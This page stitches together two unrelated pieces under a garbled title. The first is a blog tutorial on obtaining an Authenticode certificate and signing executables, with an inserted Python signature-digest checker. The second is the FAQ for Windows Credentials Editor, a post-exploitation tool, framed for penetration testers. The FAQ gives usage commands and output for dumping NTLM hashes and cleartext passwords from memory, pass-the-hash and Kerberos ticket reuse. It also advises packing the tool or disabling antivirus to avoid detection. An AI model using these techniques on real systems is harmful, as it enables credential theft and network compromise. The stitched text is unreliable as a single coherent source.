Help: signsignpictool.exee not found

Update 3/15/10: Silverlight 4 supports code signing elevated trust .XAP files
I recently jumped in and acquired an Authenticode code signing certificate & key pair. It’s great being able to sign my .NET executables, installers, and even Visual Studio 2010 extensions.
I’m documenting my efforts here in the hope that others would be able to follow the relatively straightforward process – there’s not much magic other than learning to export and work with the certificate mechanisms inside Windows. But I know a lot of devs see it as a black magic art, and really it’s just about time, money, and some quick learning.
Which dialog would you click ‘Yes’ on?
Windows 7 is leaps and bounds ahead of Vista in terms of usability. The improved User Account Control experience is nice. I think that a lot of people are finally becoming more wary of unsigned software, especially installers.
With the net full of stories of mirror servers becoming compromised, or people blindly clicking yes on many dialogs, the assurance of the dialog without the scary orange warning banner is the one I think every software developer would like to offer their customers. It’s the professional thing to do.
So here we are, from start (no cert) to finish (signing a .NET app). It only took about two days to go through the identity verification process, but the time was well worth it – and the rest is easy given the nice signing tools in Windows and Visual Studio.
We’ll be getting a certificate & private key through a trusted root certificate authority (CA) provider, not test signing or self-signing. If you’ve ever purchased an SSL certificate for your web servers, similar process.
For a list of current program members, see the list on the Microsoft site – there are hundreds of businesses and governments in the program.
Some corporate IT departments will have their own internal CA, so although those companies can sign apps for internal use, using them on machines without that CA cert installed will yield the un-trusted publisher dialog.
What is Authenticode?
Authenticode is the name for the code signing system on Windows. There are several tools that are core to code signing and ship in the Windows SDK.
Code signing certificates have an expiration date, but as long as a timestamp server is used when signing, signed apps can still be used and verified. Certificates can also be revoked if ever compromised.
For good measure, here’s a short Wikipedia page on Authenticode, and an MSDN document on the subject.
What code signing is not
Signing is only a way of proving that some person or company is who they say they are. It doesn’t tell you whether the signer is a nice person, or in any way validate the functionality of an app.
Also, .NET projects have a “Signing” tab, but this is actually a feature called strong naming, and is different. Most commercial software products using .NET will be both strong named and code signed.
What all can you use your $99/year key for?
Signing Windows executables
.NET programs, class libraries, ClickOnce apps
.MSI installer files
Adobe AIR apps
Microsoft Office/VBA macros
Mozilla objects and extensions
Signing Visual Studio extension packages (.vsix files), although SignTool doesn’t directly support this (no SIP module)
Note that only Verisign offers code signing certificates for Windows device drivers through a special program for kernel-mode code signing.
How does Microsoft do code signing?
Obviously the Microsoft corporate keys are extremely secure and private. All signing is performed through a set of intricate systems that accept builds, check conditions, scan for viruses, and who knows what else… and eventually provide the signed binaries.
It’s pretty much a black box to us as engineers, but it works for hundreds of thousands of files.
As a dev, I’ve had more than my share of wild Friday nights trying to get code strong named and signed: there’s a big process and it revolves around a lot of people, smart cards, and it eventually works out.
Step-by-step guide to purchasing a certificate
Here’s my experience with getting a certificate. Different certification companies may have different processes, but in general you can be sure that you will need to do a lot to prove the authenticity of your name/company.
You can purchase a personal certificate (independent developer, professional geek) quicker than a corporate certificate given the different proof requirements.
Since the name/company name is what will be shown in the publisher field, you obviously wouldn’t want to get a personal certificate for company use. Also, be aware that the address you provide to a signing company will be embedded inside the certificate.
I purchased my code signing cert through K Software, which is an official reseller of Comodo certificates, a popular Level 2 CA whose certificates are part of the root CA program on computers everywhere. The certificate costs $99 per year. I’ve heard of other companies sometimes offering specials as low as $65 a year, and others such as Verisign asking $499 a year.
Since there is some pain in the process (producing copious amounts of evidence) and waiting for that to be validated, you may want to consider purchasing a multi-year certificate and skip having to renew yearly.
You must use Windows and either Internet Explorer or Firefox to make the initial request. After the entire process is complete and the certificate is issued (days later), you will need to use the same computer and browser to complete the process. You will then export the certificate and private key to a file so you can store it safely somewhere.
What proof will be required
This is a partial list; the authentication process may require other documents. Most verification can be done through fax, mail, or even email.
If you’ve ever purchased an SSL certificate, it’s almost the same exact process.
Your own domain name:
The domain’s WHOIS records must match the information you provide in your order.
If you use Private Registration services, you’ll need proof from the private registration company that you own the domain and your address matches. This can be a pain.
Corporate entities:
Articles of Incorporation
Business License
Other documentation such as DUNS details
Individuals:
Driver’s license or passport
Recent utility statements with matching data
Phone statement with matching information, name, and phone number where final phone verification will be performed
This information will be asked for after you order and pay for the service. It is performed by the CA (Comodo in my case), not by the company or reseller you buy the service from.
For the remainder of this section, everything will be specific to Comodo. I found them helpful, quick and responsive, and professional, so I would definitely recommend their service. It is a great value when purchased through a reseller.
Step 1: Register with the CA to track your validation tickets and receive support
You’ll need to do this with an email address at your domain name. You register with the same email you’ll use in the next step.
If you don’t usually receive mail at your domain, you should be able to easily set up mail forwarding to your normal mail address. On a Windows server, a mail forwarding tool sets up in minutes and is great for this.
Simply create an account at Comodo Support for this.
Step 2: Submit basic data and purchase
Start at the K Software site, which is a reseller of Comodo’s.
Current prices are $99 US for one year, $198 for 2 years, and so on.
After navigating to the page, click Buy Now. Internet Explorer will pop up a message that the site is attempting to perform a digital certificate operation. Click Yes.
On the order form page, you will submit your details, including address, email, etc. The email address needs to be an email address on your domain name that can be verified, not a Hotmail or Google Mail address. Note that this information will be embedded inside the final issued certificate.
Important values at the end of the page:
CSP should be Microsoft Enhanced Cryptographic Provider v1.0 (the default)
Key size: 2048 is fine for most people
Exportable: definitely – if you don’t check this, you can’t get a PKCS 12 (.pfx on Windows) file to use for signing, and would have to do all signing on that machine
User protected: Leave this unchecked
After clicking Submit Order, you’ll go to a payment page. I used PayPal and was done in seconds.
Step Three: You’ll be contacted
At this point you’re done with the K Software order. You will be contacted via e-mail from Comodo, and they’ll step you through what verification they need at that time, and how to submit it.
In my case I had to go through several rounds of verification, including sending a recent phone bill.
I ran into some hiccups because the domain name I used for the e-mail address, though owned by me, is hard to prove: my WHOIS data all says ‘Domains By Proxy’, which is the provider of private registration services for GoDaddy. I had to find a way to provide proof that I own the domain.
The final verification step is when they eventually call your phone number. After that call, they’ll issue the certificate approval, and you’ll receive a final e-mail about 20 minutes later to go pick up the certs.
This step took me 1.5 business days including waiting time.
Step Four: Pick up your key
On the same computer you started the operation on, and same browser, click on the link provided in the e-mail Comodo sent when the key was ready.
On this page, you’ll again receive a notification about a certificate operation. That’s fine. At this point you now have the key stored in your browser certificate system.
Step Five: Export your key
This step is for Internet Explorer users. If you’re using Mozilla Firefox, the export steps are different.
In IE now, click Tools | Internet Options. Click on the Content tab, and then the Certificates button:
Within the Personal (first) tab of the Certificates dialog, click on the new certificate issued by UTN-USERFirst-Object (this is one of the many Comodo level 2 CAs in the Windows root CA program):
Then click ‘Export…’. In the Certificate Export Wizard, read the useless text and click Next.
Select the option ‘Yes’ for exporting the private key along with the certificate.
Next, you pick the file format. Only PFX/PKCS #12 should be available. I checked both ‘Include all certificates in the certification path if possible’ and ‘Export all extended properties’, though to be honest I haven’t a clue whether this is needed.
I wouldn’t recommend clicking the delete private key option, I like knowing that on this particular machine I can still re-export the cert as needed in the future.
Now, come up with a password to protect the file. You will need to use this password when using tools such as SignTool.exe, or setting up an automated code signing process of your own.
Finally, pick where you want your .PFX file stored.
Step Six: Protect your key
Although code signing certificates have a mechanism through the CA to revoke keys, you do not ever want to have to do this.
Take precautions. It is your duty to protect your key. Many people find ways to store this information through smart card or other physical security mechanisms.
As an individual, it’s pretty easy for me: Only I know the password, I have the file securely stored, and I don’t need to worry about sharing it with others.
Business entities and groups will have more trouble coming up with the appropriate processes and systems for this. Ideally some sort of automated system should be used to perform the code signing; alternatives that involve handing out the key file and a password to people are not the best method.
Import Wizard Note
To manually sign on another machine, you’ll want to double-click on the .pfx file. An import wizard will open up that will allow you to install the cert and private key on your machine.
For manual signing you typically select from your private certificate store on the machine, instead of using the .pfx file directly. For automated signing, you probably will use the .pfx.
How to sign your apps and libraries
Now the fun part. Armed with your new code signing certificate and private key, you’re ready to go SignTool.exe’ing.
SignTool is included with the Windows 6.0 and 7.0A SDKs, and you’ll have it in your path if you have Visual Studio 2008 or 2010 installed and are using the associated Visual Studio Command Prompt.
You can create scripts to sign quickly using command line parameters, or even write .NET apps using types in the System.Security.Cryptography.X509Certificates namespace.
It’s easiest to get started by manually signing, using the Digital Signature Wizard. From a Visual Studio 2008 Command Prompt, for instance, run:
signtool.exe signwizard
This will popup the wizard that will walk you through.
Select the file you want to sign:
The ‘Typical’ option will let you pick from the certificate store on your machine. You don’t actually select the previously-exported .PFX file when manually signing.
Here I click ‘Select from Store…’:
Which pops up a Windows dialog listing available code signing certificates.
Here I can verify the goods:
On the next wizard page, you can optionally provide more information, as appropriate.
The last optional, but highly recommended step, is to use the timestamp server provided by the CA. This is a service that authenticates when the data (your app) was signed.
This means that your app will continue to be valid, even after the certificate expires, as long as the cert is not revoked.
For Comodo, their timestamping server is:
Click Next and you’ll see the summary of what signing is to take place.
After clicking Finish, the dialog will go away, and pretty soon you should receive a success/failure message.
CodeSign.exe Parameters
You can also code sign in scripts and the command line using arguments. For instance, here’s a sample made-up signing argument list. You can specify any number of files to sign as the final arguments.
signtool.exe sign /f PathToKeysAndCert.Pfx /p "MySuperSecretPasswordToUseThePfxFile" /v /t <timestamp server URL> /authenticode "C:\MyFileToSign.exe"
For all the parameters, type ‘signtool sign /?’
That’s it!
You can use a variety of tools to check that the signing works fine, including just examining the file in the Windows explorer.
Authenticode-signed executables, MSIs and libraries will have a ‘Digital Signatures’ tab in the properties window (though not irregular file types, such as Adobe AIR files).
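As an added example (my own code, not from the original post and not part of any Microsoft tool), here is a small Python checker that does at the byte level what the Explorer tab does when it shows a signature: it locates the WIN_CERTIFICATE table through the PE security directory and computes the Authenticode digest with the same exclusions SignTool uses (CheckSum field, security directory entry, certificate table). The sample image it builds is a headers-only PE32 constructed for the demo, and the PKCS#7 blob in it is a placeholder, not a real signature.

```python
import hashlib
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4        # data directory slot for the certificate table
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002   # bCertificateType used by Authenticode


def _locate_directories(pe):
    """Return (optional header offset, data directory base offset) for a PE32/PE32+ file."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    opt = e_lfanew + 4 + 20                      # skip PE signature and COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:                           # PE32: directories start at +96
        return opt, opt + 96
    if magic == 0x20B:                           # PE32+: directories start at +112
        return opt, opt + 112
    raise ValueError("unknown optional header magic 0x%X" % magic)


def find_authenticode_signature(pe):
    """Return the embedded WIN_CERTIFICATE as a dict, or None when the file is unsigned."""
    opt, dir_base = _locate_directories(pe)
    ndirs = struct.unpack_from("<I", pe, dir_base - 4)[0]   # NumberOfRvaAndSizes
    if ndirs <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return None
    sec_off, sec_size = struct.unpack_from("<II", pe, dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    if sec_off == 0 or sec_size == 0:
        return None
    # Unlike every other directory, this entry holds a raw file offset, not an RVA.
    if sec_size < 8 or sec_off + sec_size > len(pe):
        raise ValueError("certificate table lies outside the file")
    length, revision, cert_type = struct.unpack_from("<IHH", pe, sec_off)
    if length < 8 or length > sec_size:
        raise ValueError("WIN_CERTIFICATE dwLength inconsistent with directory size")
    return {"offset": sec_off, "revision": revision, "cert_type": cert_type,
            "pkcs7": pe[sec_off + 8:sec_off + length]}


def authenticode_digest(pe, algo="sha256"):
    """Hash the file the way Authenticode does: everything except the CheckSum field,
    the security directory entry and the certificate table itself. Assumes sections sit
    in file order and nothing follows the certificate table (true for typical binaries)."""
    opt, dir_base = _locate_directories(pe)
    checksum_off = opt + 64
    sec_entry = dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    sec_off, sec_size = struct.unpack_from("<II", pe, sec_entry)
    skip = [(checksum_off, checksum_off + 4), (sec_entry, sec_entry + 8)]
    if sec_off and sec_size:
        skip.append((sec_off, sec_off + sec_size))   # the signature never covers itself
    h = hashlib.new(algo)
    pos = 0
    for start, end in skip:                           # ranges are in ascending file order
        h.update(pe[pos:start])
        pos = end
    h.update(pe[pos:])
    return h.hexdigest()


def build_sample_pe(pkcs7=None):
    """Constructed minimal PE32 image (headers only, no sections) used as sample input.
    With pkcs7=None the image is unsigned; otherwise a WIN_CERTIFICATE wraps the blob."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x0102)  # i386, 224-byte opt hdr
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 60, 0x200)                           # SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    image = bytearray((bytes(dos) + b"PE\0\0" + coff + bytes(opt)).ljust(0x200, b"\0"))
    if pkcs7 is None:
        return bytes(image)
    cert = struct.pack("<IHH", 8 + len(pkcs7), 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + pkcs7
    cert = cert.ljust((len(cert) + 7) & ~7, b"\0")                   # table is 8-byte aligned
    struct.pack_into("<II", image, 0x58 + 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                     len(image), len(cert))
    return bytes(image) + cert
```

Because the certificate table is excluded from the digest, bytes inside it can change without altering the hash, which is why a verifier must validate the PKCS#7 contents (signer chain, timestamp, embedded digest) rather than merely check that a signature is present.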
Here’s the .exe I signed:
And that’s it! Ship it!
Your customers will have that extra level of confidence when using your application. The more professional software developers and software companies code sign, the more likely customers will be able to make proper security decisions about their computers… and the real benefit of the crisp user account control user interface comes to light.
Hope this helps. Let me know how your experiences with code signing go.
Amplia Security - Research - WCE FAQ
Windows Credentials Editor (WCE) F.A.Q.
What is WCE?
Windows Credentials Editor (WCE) is a security tool that allows you to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).
The tool allows users to:
- Perform Pass-the-Hash on Windows
- 'Steal' NTLM credentials from memory (with and without code injection)
- 'Steal' Kerberos Tickets from Windows machines
- Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
- Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.
What is the current version?
The current version of WCE 32bit is v1.42, and the current version of WCE 64bit is v1.42. Since version 1.4beta there is also a "Universal Binary" which runs on both 32bit and 64bit systems.
Who should use WCE?
WCE is aimed at security professionals and penetration testers. It is basically a post-exploitation tool to 'steal' and reuse NTLM hashes, Kerberos tickets and plaintext passwords which can then be used to compromise other machines. Under certain circumstances, WCE can allow you to compromise the whole Windows domain after compromising only one server or workstation.
What Operating Systems does WCE support?
WCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions).
Is WCE like cachedump?
NO. Cachedump obtains NTLM credentials from the Windows Credentials Cache (aka logon cache, logon information cache, etc).
This cache can be disabled, and it is very often disabled by network/domain/windows administrators.
WCE will be able to steal credentials even when this cache is disabled.
WCE obtains NTLM credentials from memory, which are used by the system to perform SSO; it uses a series of techniques the author of WCE developed and published some years ago.
Also, cachedump does not allow you to perform Pass-the-hash, nor does it allow you to 'steal' and reuse Kerberos tickets.
Is WCE like pwdump?
NO. Pwdump dumps NTLM credentials from the local SAM. WCE dumps credentials stored in memory, which are used by the system to perform SSO; it uses a series of techniques the author of WCE developed and published some years ago.
This is one of the reasons why you may be able to compromise the whole Windows domain after compromising only one server: NTLM credentials stored in memory and obtained by WCE could have been left there, for example, by Domain Administrators that connected to the server using RDP. In this scenario, pwdump will only allow you to obtain the NTLM credentials of the local SAM, which will probably be useless, since the server is not the domain controller.
Also, pwdump does not allow you to perform Pass-the-hash, nor does it allow you to 'steal' and reuse Kerberos tickets.
Is WCE like Cain & Abel?
No. WCE and Cain&Abel are two different tools with different functionality. In fact, Cain&Abel does not implement any of the functionality implemented by WCE, for example:
* It does not implement Pass-the-Hash natively in Windows
* It does not dump NTLM hashes stored in memory (it dumps local and remote SAMs, which is not the same thing)
* It does not implement Pass-the-Ticket for Kerberos
* It does not dump cleartext logon passwords stored in memory
This does not imply WCE is a better tool, Cain&Abel also implements many things WCE does not, they are just different tools with different functionality. You should use both!
Where can I find more information about how WCE works?
"WCE Internals" presentation. RootedCon 2011; Madrid, Spain.
Where can I find information on how to use WCE on a pentest?
"Post-Exploitation with WCE" presentation, UBA 2011 - Spanish
What privileges do I need to run WCE?
You need local administrator privileges to run WCE and be able to steal NTLM credentials from memory. This is a post-exploitation tool.
You also need local administrator privileges to perform Pass-The-Hash (change your current NTLM credentials, or launch a new program in a new Windows logon session with the NTLM credentials specified).
How do I list NTLM credentials in memory?
By default, WCE lists NTLM credentials in memory, no need to specify any options.
For example:
C:\Users\test>wce.exe
WCE v1.2 (Windows Credentials Editor) - (c)
Amplia Security - by Hernan Ochoa ()
Use -h for help.
theuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CBBF2A37
C:\Users\test>
In this case, only one user/credential set is listed. If there are more in memory, more will be displayed.
How do I change my current NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CBBF2A37
WCE v1.2 (Windows Credentials Editor) - (c)
Amplia Security - by Hernan Ochoa ()
Use -h for help.
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CBBF2A37
NTLM credentials successfully changed!
C:\Users\test>
How do I create a new logon session and launch a program with new NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CBBF2A37 -c cmd.exe
WCE v1.2 (Windows Credentials Editor) - (c)
Amplia Security - by Hernan Ochoa ()
Use -h for help.
Changing NTLM credentials of new logon session (h) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CBBF2A37
NTLM credentials successfully changed!
C:\Users\test>
At this point, a new cmd.exe instance will be launched and network connections using NTLM initiated from that instance will use the NTLM credentials specified. Of course, you can run any program, not just cmd.exe.
This feature is very useful, because you can do many tests and do Pass-the-Hash with many different users without having to change your current Windows logon session and credentials.
How can I generate NTLM hashes with WCE? (for testing purposes)
wce.exe -g <cleartext password>
For example:
C:\Users\test>wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c)
Amplia Security - by Hernan Ochoa ()
Use -h for help.
mypassword
74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC
C:\Users\test>
While testing WCE, and other things, it is very common to have the need to generate LM and NT hashes from a password. This can be done using the '-g' parameter as shown above.
What is 'safe mode'?
WCE is the first and only tool that can read NTLM credentials stored by Windows in memory without injecting code. WCE is able to locate and understand the undocumented structures used by Windows to store the credentials, find encryption keys and decrypt credentials just by reading the system's memory.
This technique is very safe (hence the name 'safe mode') and tries to ensure that the system where WCE is executed will not crash. This is extremely important if you are a penetration tester and want to run WCE without risking a server crash.
WCE will automatically attempt to use this technique first when obtaining NTLM credentials; however, it will also automatically attempt code injection if the first technique failed.
For this reason, if you want to ensure WCE will only attempt to obtain NTLM credentials by reading memory (without code injection), you can use the -f switch (Force 'safe mode').
C:\Users\test>wce.exe -f
WCE v1.2 (Windows Credentials Editor) - (c)
Amplia Security - by Hernan Ochoa ()
Use -h for help.
theuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CBBF2A37
C:\Users\test>
Having said that, you use the tool at your own risk; no guarantee is given.
How can I write hashes obtained by WCE to a file?
Use the -o switch. For example:
C:\>wce -o output.txt
WCE v1.2 (Windows Credentials Editor) - (c)
Amplia Security - by Hernan Ochoa ()
Use -h for help.
C:\>type output.txt
test:AMPLIALABS:90102
How can I dump logon cleartext passwords with WCE?
The -w switch can be used to dump logon passwords stored in cleartext by the Windows Digest Authentication package. For example:
C:\>wce -w
WCE v1.3beta (Windows Credentials Editor) - (c) 12 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
test\MYDOMAIN:mypass1234
NETWORK SERVICE\WORKGROUP:test
A video shows the use of the -w switch on a Windows 2008 Server (watch in 720p for best quality).
How can I prevent WCE dumping my logon password in cleartext?
When you log in to a Windows system, your cleartext password is handed over to all the Security Packages installed on the system. This includes the NTLM security package (msv1_0.dll), the Kerberos security package (kerberos.dll), the Digest Authentication Security Package (wdigest.dll), etc. These packages take the cleartext password and basically do what they desire with it. For example,
the NTLM security package generates and stores in memory the NTLM hashes discarding the cleartext password, and the Digest Authentication package stores in memory the cleartext password encrypted. The techniques invented by WCE precisely consist in extracting from these packages these credentials stored in memory.
For this reason, one of the ways to prevent WCE dumping your cleartext login password and other credentials is to avoid loading the Security Packages from which WCE retrieves them.
These are defined in registry at the following location:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
You will find there a list similar to the following:
You can remove an item from the list and (after rebooting) Windows will not load the corresponding Security Package.
For example, you can remove wdigest and tspkg and WCE will not be able to dump the cleartext password stored by these packages simply because they will not be loaded anymore.
Although this works, keep in mind that you may encounter problems if your environment uses one of the security packages you remove; you will need to test how this affects you specifically. Also, removing fundamental security packages like msv1_0 can have catastrophic consequences, so apply this technique at your own risk.
WCE is detected by the antivirus/HIPS. what can I do to avoid detection?
Use a PE packer, for example UPX. If UPX does not do the trick, try other PE packers, there are many out there. Also, since you need administrator privileges to run WCE, try disabling the AV/HIPS before running WCE...
What is GETLSASRVADDR.EXE?
GETLSASRVADDR.exe is a tool (included with WCE) that can be used to obtain automatically the needed addresses for WCE to be able to read logon sessions and NTLM credentials from memory (without code injection) when WCE is not able to do it by itself out-of-the-box.
Addresses obtained can then be used with WCE using the -A switch.
This tool requires the DLLs symsrv.dll and dbghelp.dll available from the "Debugging Tools for Windows" package.
When should I use GETLSASRVADDR.EXE?
Basically, you should use GETLSASRVADDR.exe when you want to use 'safe mode' to extract hashes from memory on a system where out-of-the-box WCE is unable to make it work.
GETLSASRVADDR.exe will give you the information WCE needs to get 'safe mode' working.
I can't get GETLSASRVADDR.EXE to work. What's the problem?
The most common source of problems is that you are missing the DLL files symsrv.dll and dbghelp.dll available from the "Debugging Tools For Windows" package.
This is most likely the case if you are getting the following error message:
Connecting
symbol server...please wait..
Error: cannot find symsrv.dll
Error: Cannot obtain addresses
Read the presentation for an explanation on why these DLLs are required.
The tool getlsasrvaddr.exe is meant to be used on the attacker's machine, and not on the target machine, so this requirement should not be an issue.
Another common issue is having UAC enabled and not being able to access c:\windows\system32\lsasrv.dll. In this case, just copy lsasrv.dll to another directory and try again.
Who's the author of WCE? Is he also the author of the PSH Toolkit?
The author of WCE is Hernan Ochoa (hernan [ at ] ); and yes, he is also the author of the now defunct Pass-The-Hash Toolkit.
How is WCE better than the PSH Toolkit?
The Pass-The-Hash (PSH) Toolkit does not work anymore. It does not support
newer updates for Windows XP and 2003; and it does NOT support Windows 7 and 2008 at all.
WCE is basically a complete rewrite from scratch; it uses new techniques and does lots of things automagically to make its use easier and to make it work automatically on more platforms. It also works perfectly with all Windows versions, including Windows 7 and 2008; and it is the only tool that is able to read credentials just by reading memory, without code injection, which is very important to penetration testers, since this means the chances of crashing a server when using WCE are almost zero (although neither the author nor Amplia Security guarantee this; you use the tool at your own risk).
Also, the PSH Toolkit does not allow you to 'steal' and reuse Kerberos tickets.
(Note: remember the author of WCE is also the author of the PSH Toolkit).